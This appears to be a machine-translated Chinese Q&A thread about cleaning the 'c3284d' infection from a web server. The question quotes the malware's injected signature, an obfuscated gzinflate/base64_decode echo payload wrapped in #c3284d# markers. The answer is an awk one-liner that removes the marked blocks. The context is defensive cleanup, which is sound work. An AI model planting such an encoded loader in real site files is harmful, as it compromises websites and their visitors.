我遇到了臭名昭著的c3284d病毒。它几乎可以修改所有可以找到的html / php / js文件。
我已经更改了服务器上的所有密码和用户,因此,如果它是一个受感染的帐户,它应该已经解决了该问题,但是我仍在努力将其完全删除。
我可以使用一个简单的sudo grep -R "#c3284d#" /home命令找到所有受感染的文件。
sudo grep -R "#c3284d#" /home
但是我需要一种快速的方法来搜索和 替换 它。
病毒签名是这一行:
“#c3284d#” 回波(gzinflate(BASE64_DECODE( “VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw ==”))); “#/ c3284d#”
当回声线可以改变和变化时,但始终以开头#c32..#和结尾#/c3....#。
#c32..#
#/c3....#
我只想一无所有。
awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file
那是一个大嘴巴,但是可以解决这个问题:
$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' > foo > #c3284d# > bar > baz > #/c3284d# > quux > EOF foo quux